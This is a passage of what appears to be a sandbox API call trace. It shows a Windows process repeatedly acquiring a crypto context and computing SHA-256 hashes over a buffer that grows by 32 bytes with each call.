dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.040] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0148.040] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c030 [0148.040] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.040] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0148.040] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.041] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.041] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0148.041] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c000 [0148.041] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.041] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.041] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0148.041] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.041] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0148.041] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bf10 [0148.041] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.041] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0148.041] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338239d0) returned 1 [0148.042] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.042] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x500, dwFlags=0x0) returned 1 [0148.042] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bfa0 [0148.042] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.042] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0148.042] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338222d0) returned 1 [0148.043] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.043] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x520, dwFlags=0x0) returned 1 [0148.043] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c060 [0148.043] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.043] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0148.043] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.043] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.043] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x540, dwFlags=0x0) returned 1 [0148.043] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c0f0 [0148.043] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.043] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.043] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822bd0) returned 1 [0148.044] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.044] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x560, dwFlags=0x0) returned 1 [0148.044] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bf40 [0148.044] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.044] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0148.044] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338227d0) returned 1 [0148.045] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.045] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x580, dwFlags=0x0) returned 1 [0148.045] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c120 [0148.045] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.045] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0148.045] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338233d0) returned 1 [0148.045] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.046] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0148.046] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bf70 [0148.046] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.046] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0148.046] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.046] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.046] CryptHashData (hHash=0x332b77b0, pbData=0x32e4ee50, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0148.046] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c240 [0148.046] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0148.046] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.046] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ad0) returned 1 [0148.047] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.047] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0148.047] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5bfd0 [0148.047] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.047] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0148.047] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.048] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.048] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x600, dwFlags=0x0) returned 1 [0148.048] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c0c0 [0148.048] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.048] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.048] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0148.048] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.048] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x620, dwFlags=0x0) returned 1 [0148.048] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c210 [0148.048] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.048] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0148.048] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821ed0) returned 1 [0148.050] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.050] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x640, dwFlags=0x0) returned 1 [0148.050] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c150 [0148.050] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.050] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0148.050] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338238d0) returned 1 [0148.051] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.051] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x660, dwFlags=0x0) returned 1 [0148.051] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e5c270 [0148.051] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.051] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0148.051] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.051] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.051] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x680, dwFlags=0x0) returned 1 [0148.051] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58dc0 [0148.051] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.051] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.051] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821dd0) returned 1 [0148.052] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.052] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0148.052] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58430 [0148.052] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.052] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0148.052] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.053] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.053] CryptHashData (hHash=0x332b7890, pbData=0x32e4ee50, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0148.053] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58490 [0148.053] CryptDestroyHash (hHash=0x332b7890) returned 1 [0148.053] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.053] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0148.057] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.057] CryptHashData (hHash=0x332b7900, pbData=0x32e4ee50, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0148.057] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58a60 [0148.058] CryptDestroyHash (hHash=0x332b7900) returned 1 [0148.058] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0148.058] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338231d0) returned 1 [0148.058] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.058] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x700, dwFlags=0x0) returned 1 [0148.058] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58cd0 [0148.058] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.058] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0148.058] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.059] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.059] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x720, dwFlags=0x0) returned 1 [0148.059] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58d00 [0148.059] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.059] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.059] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338236d0) returned 1 [0148.060] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.060] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x740, dwFlags=0x0) returned 1 [0148.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58e80 [0148.060] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.060] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0148.060] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0148.060] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.060] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x760, dwFlags=0x0) returned 1 [0148.060] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58b50 [0148.060] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.060] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0148.060] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.061] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.061] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x780, dwFlags=0x0) returned 1 [0148.061] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58460 [0148.061] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.061] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.061] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338229d0) returned 1 [0148.062] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.062] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0148.062] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58ee0 [0148.062] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.062] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0148.062] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33821fd0) returned 1 [0148.062] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.062] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0148.062] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e584f0 [0148.062] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.062] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0148.063] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822fd0) returned 1 [0148.063] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.063] CryptHashData (hHash=0x332b7a50, pbData=0x32e4ee50, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0148.063] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58c70 [0148.063] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0148.063] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0148.063] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823ad0) returned 1 [0148.064] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.064] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x800, dwFlags=0x0) returned 1 [0148.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e585b0 [0148.064] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.064] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0148.064] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0148.064] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.064] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x820, dwFlags=0x0) returned 1 [0148.064] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58ca0 [0148.065] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.065] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0148.065] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338220d0) returned 1 [0148.065] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.065] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x840, dwFlags=0x0) returned 1 [0148.065] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58b80 [0148.065] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.065] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0148.065] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0148.066] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.066] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x860, dwFlags=0x0) returned 1 [0148.066] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e588b0 [0148.066] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.066] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0148.066] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33823bd0) returned 1 [0148.066] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.066] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x880, dwFlags=0x0) returned 1 [0148.067] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58c40 [0148.067] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.067] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0148.067] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338235d0) returned 1 [0148.067] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.067] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0148.067] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58760 [0148.067] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.067] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0148.067] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338237d0) returned 1 [0148.068] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.068] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0148.068] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e586a0 [0148.068] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.068] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0148.068] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822ed0) returned 1 [0148.069] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.069] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0148.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58340 [0148.069] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.069] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0148.069] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338239d0) returned 1 [0148.069] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.069] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x900, dwFlags=0x0) returned 1 [0148.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e584c0 [0148.069] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.069] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0148.070] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338222d0) returned 1 [0148.070] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.070] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x920, dwFlags=0x0) returned 1 [0148.070] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58790 [0148.070] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.070] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0148.070] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338230d0) returned 1 [0148.071] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.071] CryptHashData (hHash=0x332b7d60, pbData=0x32e4ee50, dwDataLen=0x940, dwFlags=0x0) returned 1 [0148.071] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e588e0 [0148.071] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0148.071] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0148.071] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x33822bd0) returned 1 [0148.072] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.072] CryptHashData (hHash=0x332b7660, pbData=0x32e4ee50, dwDataLen=0x960, dwFlags=0x0) returned 1 [0148.072] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58370 [0148.072] CryptDestroyHash (hHash=0x332b7660) returned 1 [0148.072] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0148.072] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceb00*=0x338227d0) returned 1 [0148.072] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceaf0 | out: phHash=0xceaf0) returned 1 [0148.072] CryptHashData (hHash=0x332b7970, pbData=0x32e4ee50, dwDataLen=0x980, dwFlags=0x0) returned 1 [0148.072] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58820 [0148.072] CryptDestroyHash (hHash=0x332b7970) returned 1 [0148.072] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0148.072] CryptAcquireContextW (in: phProv=0xceb00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 